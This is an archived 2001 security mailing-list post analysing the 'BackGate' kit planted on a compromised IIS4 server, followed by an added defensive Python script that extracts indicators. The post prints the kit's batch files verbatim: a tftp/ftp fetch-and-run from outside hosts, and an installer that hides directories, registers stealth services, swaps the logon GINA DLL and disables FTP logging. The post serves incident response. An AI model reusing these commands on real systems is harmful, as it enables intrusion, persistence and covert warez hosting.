Security Incidents mailing list archives
FW: I've been hacked! [BackGate Kit]
From: Matt Scarborough <vexversa () USA NET>
Date: Tue, 20 Feb 2001 18:14:51 EST
Moderator: Incidents, Forensics, or the bit bucket, whatever you like.

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+ FW: I've been hacked!!                                             +
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

On Mon, 19 Feb 2001 22:21:51 -0500, "Larry K." wrote

I am fairly new to security issues, but I am very experienced with Windows.
Today I found that someone broke into my NT 4.0 server. It is running IIS 4
for an internal web page and someone copied some files to my scripts
directory. They were able to execute a file called dl.exe that was hogging
all of my CPU cycles. I found that I had not removed anonymous access and
access from the outside. Can anyone help me find out how they got in and
make sure that they can't get back in? Any help would be appreciated.

Here is a list of the file names:

00.d
dl.bat
dl.exe
ftpcmds.txt

dl.bat contains the following:

@echo off
cd \Inetpub\scripts
startDL:
tftp.exe -i web004.2coolweb.com get DL.exe
if not exist DL.exe goto startDL
start /w DL.exe
ren 00.D install.bat
attrib TFTP* -r
attrib DL.exe -r
del TFTP*
del DL.exe
install.bat %1
exit

ftpcmds.txt contains the following:

open 216.205.125.115 29292
user DL DL
get 00.D
get 01.D
get 02.D
get 03.D
get 04.D
get 05.D
get 06.D
get 07.D
get 08.D
get 09.D
get 10.D
get 11.D
get 12.D
get 13.D
bye

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+ END FW: I've been hacked!!                                         +
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

While this doesn't shed much light on how Larry K. was hacked, it
illustrates the results of leaving IIS un-hardened. I ambled over to
tftp://63.84.169.1:69 (web004.2coolweb.com) for DL.EXE, and then to
ftp://DL@216.205.125.115:29292 (115-216.205.125.dellhost.com) for the
BackGate kit that was downloaded to Larry's IIS4 box. Below is what I
found. It creates a Warez repository and FTP proxy.

No response to attempts at contacting host owners or upstream of the
(T)FTP site(s) distributing malware.

Matt
2001-02-20

Text strings courtesy of BinText by Robin Keir http://www.foundstone.com
UPX is The Ultimate Packer for eXecutables http://upx.tsx.org

=====================
Contents of DL.EXE tftp from 63.84.169.1
=====================
UPX 1.02 contents Un-packed

00001C10  00401C10  0  wininet.dll
00001C20  00401C20  0  FtpGetFileA
00001C64  00401C64  0  FtpPutFileA
00001CA8  00401CA8  0  FtpSetCurrentDirectoryA
00001D08  00401D08  0  InternetOpenA
00001D50  00401D50  0  InternetConnectA
00001F70  00401F70  0  FtpOpenFileA
00001FB8  00401FB8  0  FtpDeleteFileA
000016DF  004016DF  0  @*\AZ:\FTPInstFileDL\Project1.vbp
000019D4  004019D4  0  vb wininet
00001CC4  00401CC4  0  /05.D
00002144  00402144  0  216.205.125.115
00002174  00402174  0  /00.D
00002194  00402194  0  /01.D
000021B4  004021B4  0  /02.D
000021D4  004021D4  0  /03.D
000021F4  004021F4  0  /04.D
00002224  00402224  0  /06.D
00002244  00402244  0  /07.D
00002264  00402264  0  /08.D
00002284  00402284  0  /09.D
000022A4  004022A4  0  /10.D
000022C4  004022C4  0  /11.D
000022E4  004022E4  0  /12.D
00002304  00402304  0  /13.D
=====EoF=====

================
Contents of 00.D
================
@echo off
echo Renaming Files
ren 01.D dir.txt
ren 02.D FireDaemon.exe
ren 03.D login.txt
ren 04.D MMtask.exe
ren 05.D NewGina.dll
ren 06.D reggina.exe
ren 07.D regit.exe
ren 08.D restrict.exe
ren 09.D restsec.exe
ren 10.D settings.reg
ren 11.D SUD.exe
ren 12.D makeini.exe
ren 13.D SUD.ini
echo Making ini
.\makeini.exe %1
echo Making Dirs
md %windir%\system32\os2\dll\new
attrib %windir%\system32\os2\dll\new +s +h
.\restrict.exe %windir%\system32\os2\dll\new
md %1:\adminback0810\root
attrib %1:\adminback0810\root +s +h
.\restrict.exe %1:\adminback0810\root
md %1:\adminback0810\root\system
attrib %1:\adminback0810\root\system +s +h
.\restrict.exe %1:\adminback0810\root\system
md %1:\adminback0810\root\system\dll
attrib %1:\adminback0810\root\system\dll +s +h
.\restrict.exe %1:\adminback0810\root\system\dll
echo Copying Files
copy .\FireDaemon.exe %windir%\system32\os2\dll\new\ > nul:
copy .\SUD.exe %windir%\system32\os2\dll\new\ > nul:
copy .\SUD.bak %windir%\system32\os2\dll\new\ > nul:
copy .\login.txt %windir%\system32\os2\dll\new\ > nul:
copy .\dir.txt %windir%\system32\os2\dll\new\ > nul:
copy .\MMtask.exe %windir%\system32\os2\dll\new\ > nul:
copy .\newgina.dll %windir%\system32\ > nul:
attrib %windir%\system32\newgina.dll +s +h
echo Setting up Registry
.\regit.exe .\settings.reg
echo Installing Services
set MXBIN=%windir%\system32\os2\dll\new
set MXHOME=%windir%\system32\os2\dll\new
%windir%\system32\os2\dll\new\Firedaemon.exe -i OS2SRV "%windir%\system32\os2\dll\new" "%windir%\system32\os2\dll\new\SUD.exe" "" Y 0 0 N Y
%windir%\system32\os2\dll\new\Firedaemon.exe -i MMTASK "%windir%\system32\os2\dll\new" "%windir%\system32\os2\dll\new\MMtask.exe" "" Y 0 0 N Y
.\reggina.exe
echo Waiting 5 sec.
.\restsec.exe 5
echo Starting Services
net start os2srv
net start mmtask
echo Services Installed and Started
echo Deleting Install-Files
del FireDaemon.exe
del makeini.exe
del SUD.exe
del SUD.ini
del SUD.bak
del login.txt
del dir.txt
del MMtask.exe
del newgina.dll
del restrict.exe
del regit.exe
del settings.reg
del reggina.exe
del restsec.exe
attrib E.asp -r
del E.asp
del dl.bat
del install.bat
=====EOF=====

================
Contents of 01.D DIR.TXT
================
---
%ServerKBps KBps Current bandwith used
%Dfree MB free
---
=====EoF=====

================
Contents of 02.D FIREDAEMON.EXE
================
UPX 1.02 contents Un-packed

File pos  Mem pos   ID  Text
========  =======   ==  ====
0000E2AC  0040E2AC  0   v0.09c
0000E2B4  0040E2B4  0   (c) 1999-2000 Sublime Solutions
0000E2D5  0040E2D5  0   Usage:
0000E2E0  0040E2E0  0   [-i <ServiceName> <AppDir>
0000E2FC  0040E2FC  0   [[AppName] [AppOpts] [Restart] [Mask] [Priority] [Interact] [Autostart]]
0000E51E  0040E51E  0   Purpose:
0000E528  0040E528  0   allows Win32 applications to be installed as
0000E556  0040E556  0   a Windows NT/2K service. The service can be run as the System Account
0000E5A5  0040E5A5  0   or as an NT/2K domain account.
0000F05C  0040F05C  0   URL: http://www.firedaemon.com/
0000F083  0040F083  0   Bugs: Please report bugs to support () firedaemon com
=====EoF=====

================
Contents of 03.D LOGIN.TXT
================
---
Running for: %ServerDays Days, %ServerHours Hours, %ServerMins Minutes and %ServerSecs Seconds
---
%ServerKbUp Kilobytes uploaded in %ServerFilesUp Files
%ServerKbDown Kilobytes downloaded in %ServerFilesDown Files
%ServerAvg KBps Average bandwith used
%Uall User(s) connected since server start
%UNow User(s) currently connected
=====EoF=====

================
Contents of 04.D WG3ENG9X.EXE
================
UPX 1.02 contents Un-packed

000DC38A  004E398A  0  VS_VERSION_INFO
000DC434  004E3A34  0  WinGate 3.0 Engine for Windows 9X
000DC4F4  004E3AF4  0  WinGate Engine
000DC51A  004E3B1A  0  FileVersion
000DC534  004E3B34  0  1, 0, 1, 4
000DC582  004E3B82  0  LegalCopyright
000DC5B6  004E3BB6  0  1998 Qbik New Zealand Limited
000DC61C  004E3C1C  0  WinGate (TM)
000DC63E  004E3C3E  0  OriginalFilename
000DC660  004E3C60  0  WG3ENG9X.EXE
=====EoF=====

================
Contents of 05.D NEWGINA.DLL
================
Export Table
Name:            NEWGINA.dll
Characteristics: 00000000
Time Date Stamp: 38642141
Version:         0.00
=====EoF=====

================
Contents of 06.D REGGINA.EXE
================
File pos  Mem pos   ID  Text
========  =======   ==  ====
00004348  00404348  0   Microsoft Visual C++ Runtime Library
000050B4  004050B4  0   System\CurrentControlSet\Services\OS2srv
000050E0  004050E0  0   DisplayName
000050EC  004050EC  0   MMtask
000050F4  004050F4  0   System\CurrentControlSet\Services\MMtask
00005120  00405120  0   MSgina.dll
0000512C  0040512C  0   newgina.dll
00005138  00405138  0   OriginalGinaDLL
00005148  00405148  0   GinaDLL
00005150  00405150  0   Software\Microsoft\Windows NT\CurrentVersion\Winlogon
=====EoF=====

================
Contents of 07.D REGEDIT.EXE
================
00009548  00409548  0  Compressed by Petite (c)1999 Ian Luck.
0000F7A6  0041ABA6  0  VS_VERSION_INFO
0000F96A  0041AD6A  0  Microsoft Corp. 1993-1995
0000F8EC  0041ACEC  0  4.00.1111 REGEDIT.EXE
=====EoF=====

================
Contents of 08.D REGIT.EXE
================
000000C8  004000C8  0  Compressed by Petite (c)1999 Ian Luck.

Import Table
ADVAPI32.dll
Ordinal  Function Name
0000     AddAce
=====EoF=====

================
Contents of 09.D RESTSEC.EXE
================
IDW tools

File pos  Mem pos   ID  Text
========  =======   ==  ====
00006620  06069220  0   Copyright (C) Microsoft Corp. 1981-1996
00006676  06069276  0   OriginalFilename
00006698  06069298  0   Sleep.Exe and Beep.Exe
000066CE  060692CE  0   ProductName
000066E8  060692E8  0   Microsoft(R) Windows NT(TM) Operating System
=====EoF=====

================
Contents of 10.D REGEDIT 4 format SETTINGS.REG
================
<lots snipped>
[HKEY_LOCAL_MACHINE\SOFTWARE\Qbik Software\WinGate\Services\FTP Proxy server]
"ServiceType"="CFTPService"
"Name"="FTP Proxy server"
"Description"="FTP Proxy server"
"PortNumber"=dword:0000243b
"Enabled"=dword:00000001
"TimeOutSessions"=dword:00000001
"SessionTimeout"=dword:00000258
"SpecificBinding"="127.0.0.1"
"SOCKS4Password"=""
"BypassProxyOnLocal"=dword:00000000
=====EoF=====

================
Contents of 11.D SUD.EXE
================
UPX 1.02 contents Un-packed

File pos  Mem pos   ID    Text
========  =======   ==    ====
0014DFE0  0054F5E0  0     Serv-U FTP Server v3.0 build 9 - Copyright (c) 1995-2001 Cat Soft, All Rights Reserved - by Rob Beckers
00178954  00582754  2075  This trial version of Serv-U is out-of-date! All domains are offline
=====EoF=====

================
Contents of 12.D MAKEINI.EXE
================
Project1.exe

Import Table
MSVBVM60.DLL
Ordinal  Function Name
0000     MethCallEngine
0000     EVENT_SINK_AddRef

================
Contents of 13.D SUD.INI
================
[GLOBAL]
TryOut=Full
Version=3.0.0.7
LocalSetupPassword=<snipped>
LocalSetupPortNo=45092
DirCacheSize=60
PacketTimeOut=120
[DOMAINS]
Domain1=0.0.0.0||19216|Psychotic|1
[Domain1]
LogSystemMes=0
LogSecurityMes=0
LogGETs=0
LogPUTs=0
LogFileSystemMes=0
LogFileSecurityMes=0
LogFileGETs=0
LogFilePUTs=0
ReplyHello=PsychoticDreams
ReplyHelp=Help yourself.
ReplyNoAnon=no ANONYMOUS.
ReplyNoCredit=Upload some more.
ReplySYST=guess
ReplyTooMany=User limit reached.
ReplyDown=Server going offline.
ReplyOffline=Server offline.
DirChangeMesFile=C:\winnt\system32\os2\dll\new\dir.txt
User1=AdminIt|1
User2=MistarZet|1
User3=Tectonic|1
User4=nevermind|1
User5=Unibomber|1
User6=Nicodeimous|1
User7=Catie|1
User8=Mantis|1
User9=Pr0vit0|1
User10=X-Man|1
User11=FXskater|1
User12=delon15|1
User13=BigPun|1
User14=tafkamk|0
User15=Vegeetz|0
User16=Corsair|0
User17=palmleaf|0
User18=polux|0
User19=Termin-X|0
User20=NextLev|0
User21=X-byte|0
User22=XTracer|0
User23=Hooterman|0
User24=Section|0
User25=nightreg|0
User26=AssOnFire|0
User27=ZeroCode|0
User28=thunderbolt|0
<snipped>
=====EoF=====
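Editor's added example (not part of Matt's post, nor code from the kit): the install script, the WinGate settings.reg excerpt and the Serv-U SUD.ini quoted above are the kit's own configuration, and a responder can read the host and network indicators straight out of them rather than transcribing by hand. The script below parses constructed copies of those three fragments (reduced to the lines needed, with the LocalSetupPassword left as the placeholder the post shows) and produces a sweep list: directories created, services registered through FireDaemon, files dropped, Serv-U accounts, listening ports and the logging the kit switches off. The meaning of the Domain1 fields (bind address, port, domain name) is assumed from the sample, not documented in the post.

```python
"""Triage helper for the BackGate kit artefacts quoted in the post.

Added example, not the kit's code or the poster's. The three samples are
constructed from the fragments quoted above; field meanings in the Serv-U
Domain line are assumed from that sample.
"""
import json
import re

# --- constructed samples, copied from the fragments quoted in the post -----
INSTALL_BAT = r"""
@echo off
echo Making Dirs
md %windir%\system32\os2\dll\new
attrib %windir%\system32\os2\dll\new +s +h
md %1:\adminback0810\root
md %1:\adminback0810\root\system
md %1:\adminback0810\root\system\dll
echo Copying Files
copy .\FireDaemon.exe %windir%\system32\os2\dll\new\ > nul:
copy .\SUD.exe %windir%\system32\os2\dll\new\ > nul:
copy .\newgina.dll %windir%\system32\ > nul:
echo Installing Services
%windir%\system32\os2\dll\new\Firedaemon.exe -i OS2SRV "%windir%\system32\os2\dll\new" "%windir%\system32\os2\dll\new\SUD.exe" "" Y 0 0 N Y
%windir%\system32\os2\dll\new\Firedaemon.exe -i MMTASK "%windir%\system32\os2\dll\new" "%windir%\system32\os2\dll\new\MMtask.exe" "" Y 0 0 N Y
net start os2srv
net start mmtask
"""

SETTINGS_REG = r"""REGEDIT4

[HKEY_LOCAL_MACHINE\SOFTWARE\Qbik Software\WinGate\Services\FTP Proxy server]
"ServiceType"="CFTPService"
"Name"="FTP Proxy server"
"PortNumber"=dword:0000243b
"Enabled"=dword:00000001
"SpecificBinding"="127.0.0.1"
"""

SUD_INI = r"""[GLOBAL]
TryOut=Full
Version=3.0.0.7
LocalSetupPassword=<snipped>
LocalSetupPortNo=45092
[DOMAINS]
Domain1=0.0.0.0||19216|Psychotic|1
[Domain1]
LogSystemMes=0
LogSecurityMes=0
LogGETs=0
LogPUTs=0
LogFileSystemMes=0
LogFileSecurityMes=0
LogFileGETs=0
LogFilePUTs=0
ReplyHello=PsychoticDreams
DirChangeMesFile=C:\winnt\system32\os2\dll\new\dir.txt
User1=AdminIt|1
User2=MistarZet|1
User14=tafkamk|0
"""

WINGATE_FTP_KEY = r"HKEY_LOCAL_MACHINE\SOFTWARE\Qbik Software\WinGate\Services\FTP Proxy server"


def parse_ini(text):
    """Minimal parser shared by Serv-U .ini and REGEDIT4 .reg: {section: {key: raw}}.
    Lines outside a section (e.g. the REGEDIT4 banner) are ignored."""
    sections, current = {}, None
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            sections[current] = {}
        elif "=" in line and current is not None:
            key, _, value = line.partition("=")
            sections[current][key.strip().strip('"')] = value.strip()
    return sections


def reg_value(raw):
    """Decode a REGEDIT4 value: dword:0000243b -> 9275, "127.0.0.1" -> str."""
    if raw.lower().startswith("dword:"):
        return int(raw[6:], 16)
    return raw.strip('"')


def servu_domain(ini):
    """Domain1=ip||port|name|flag; field positions assumed from the sample."""
    f = ini["DOMAINS"]["Domain1"].split("|")
    return {"bind": f[0], "port": int(f[2]), "name": f[3]}


def servu_users(ini, domain="Domain1"):
    """UserN=name|flag -> {name: flag}; the flag's meaning is not given in the post."""
    users = {}
    for key, value in ini[domain].items():
        if re.fullmatch(r"User\d+", key):
            name, _, flag = value.partition("|")
            users[name] = int(flag or 0)
    return users


def disabled_logging(ini, domain="Domain1"):
    """Every Log* switch the kit set to 0 (anti-forensics: no transfer or security log)."""
    return sorted(k for k, v in ini[domain].items() if k.startswith("Log") and v == "0")


def wingate_ftp_proxy(reg):
    """Port and binding of the WinGate FTP proxy; 127.0.0.1 means only local netstat shows it."""
    svc = reg[WINGATE_FTP_KEY]
    return {"port": reg_value(svc["PortNumber"]),
            "bind": reg_value(svc["SpecificBinding"]),
            "enabled": reg_value(svc["Enabled"]) == 1}


def install_iocs(bat):
    """Directories, FireDaemon service names and dropped files from the 00.D script."""
    dirs = re.findall(r"^md\s+(\S+)", bat, re.M | re.I)
    services = re.findall(r"firedaemon\.exe\s+-i\s+(\S+)", bat, re.I)
    drops = re.findall(r"^copy\s+\.\\(\S+)\s+(\S+)", bat, re.M | re.I)  # (file, dest dir)
    return {"dirs": dirs, "services": services, "drops": drops}


def triage():
    """Assemble the sweep list a responder would take to the suspected host."""
    ini, reg = parse_ini(SUD_INI), parse_ini(SETTINGS_REG)
    dom, proxy, host = servu_domain(ini), wingate_ftp_proxy(reg), install_iocs(INSTALL_BAT)
    return {
        "listeners": sorted({dom["port"], proxy["port"], int(ini["GLOBAL"]["LocalSetupPortNo"])}),
        "services": host["services"],
        "dirs": host["dirs"],
        "dropped": host["drops"],
        "ftp_accounts": servu_users(ini),
        "logging_off": disabled_logging(ini),
    }


if __name__ == "__main__":
    print(json.dumps(triage(), indent=2))
```

The same parse_ini() handles both formats because REGEDIT4 is INI-shaped; only the value decoding differs. Note that the WinGate FTP proxy is bound to 127.0.0.1, so an external port scan will not find it; the Serv-U domain on 19216 and the Serv-U admin port 45092 are the ones reachable from outside.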
Current thread:
- FW: I've been hacked! [BackGate Kit] Matt Scarborough (Feb 20)